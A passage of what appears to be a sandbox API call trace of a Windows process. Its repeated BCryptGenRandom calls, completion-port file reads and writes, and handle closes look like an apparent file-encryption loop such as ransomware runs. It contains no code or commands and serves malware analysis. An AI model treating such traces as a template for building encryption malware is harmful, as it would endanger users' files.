| out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.848] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.848] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.848] free (_Block=0x3e305b8) [0167.849] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.849] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.849] free (_Block=0x1fa91d0) [0167.849] free (_Block=0x1fa2ed8) [0167.849] free (_Block=0x1fa90b8) [0167.849] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.862] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.863] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.863] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.863] free (_Block=0x3e305b8) [0167.863] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.863] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.864] free (_Block=0x1fa91d0) [0167.864] free (_Block=0x1fa2ed8) [0167.864] free (_Block=0x1fa90b8) [0167.864] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0167.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.876] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.877] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.877] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.877] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.877] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.877] free (_Block=0x3e305b8) [0167.878] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.878] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.878] free (_Block=0x1fa91d0) [0167.878] free (_Block=0x1fa2ed8) [0167.878] free (_Block=0x1fa90b8) [0167.878] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.890] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.890] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.891] free (_Block=0x3e305b8) [0167.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.891] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.891] free (_Block=0x1fa91d0) [0167.891] free (_Block=0x1fa2ed8) [0167.891] free (_Block=0x1fa90b8) [0167.891] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.902] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.902] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.902] free (_Block=0x3e305b8) [0167.902] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.902] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.902] free (_Block=0x1fa91d0) [0167.902] free (_Block=0x1fa2ed8) [0167.903] free (_Block=0x1fa90b8) [0167.903] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.975] CloseHandle (hObject=0x2a4) returned 1 [0167.975] free (_Block=0x1ff1e60) [0167.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0167.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0167.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0167.984] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.985] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.985] free (_Block=0x3e305b8) [0167.985] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.985] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.985] free (_Block=0x1fa91d0) [0167.985] free (_Block=0x1fa2ed8) [0167.985] free (_Block=0x1fa90b8) [0167.985] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.985] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.006] CloseHandle (hObject=0x308) returned 1 [0168.007] free (_Block=0x3d70450) [0168.007] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.017] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x629, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.202] CloseHandle (hObject=0x3cc) returned 1 [0168.203] free (_Block=0x3f70048) [0168.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.212] CloseHandle (hObject=0x308) returned 1 [0168.212] free (_Block=0x3e70008) [0168.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.221] CloseHandle (hObject=0x2a8) returned 1 [0168.221] free (_Block=0x1ff1e60) [0168.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.227] CloseHandle (hObject=0x338) returned 1 [0168.227] free (_Block=0x3ef0008) [0168.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.236] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0168.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0168.246] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0170.971] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x8795, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0170.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0170.989] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x8118, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0170.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0170.993] CloseHandle (hObject=0x3cc) returned 1 [0170.993] free (_Block=0x3e70008) [0170.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0170.993] CloseHandle (hObject=0x2a4) returned 1 [0170.993] free (_Block=0x3ef0008) [0170.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0171.497] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0171.498] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0171.814] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xc382, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0171.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0171.815] CloseHandle (hObject=0x170) returned 1 [0171.815] free (_Block=0x3f70048) [0171.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0171.820] ReadFile (in: hFile=0xec, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x16f40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0171.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0171.821] CloseHandle (hObject=0xec) returned 1 [0171.821] free (_Block=0x3fb00b8) [0171.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0171.826] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7c08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0172.092] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.120] CloseHandle (hObject=0x2a4) returned 1 [0172.120] free (_Block=0x3df0008) [0172.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.191] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a6b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0172.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.264] CloseHandle (hObject=0x2a4) returned 1 [0172.264] free (_Block=0x3df0008) [0172.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.283] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1a7d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0172.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0172.381] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.381] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0172.381] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.381] free (_Block=0x3e305b8) [0172.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.382] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.382] free (_Block=0x1fa91d0) [0172.382] free (_Block=0x1fa2ed8) [0172.382] free (_Block=0x1fa90b8) [0172.382] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0172.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.384] CloseHandle (hObject=0xec) returned 1 [0172.384] free (_Block=0x1ff1e60) [0172.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.520] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x30410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0172.520] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.534] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x307f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0172.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.602] CloseHandle (hObject=0x170) returned 1 [0172.602] free (_Block=0x3d70450) [0172.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.603] CloseHandle (hObject=0xec) returned 1 [0172.603] free (_Block=0x1ff1e60) [0172.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.633] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa0d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0172.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.842] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0172.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.842] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0172.843] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.843] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.843] free (_Block=0x3e305b8) [0172.843] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.843] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.843] free (_Block=0x1fa91d0) [0172.843] free (_Block=0x1fa2ed8) [0172.843] free (_Block=0x1fa90b8) [0172.843] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0172.844] 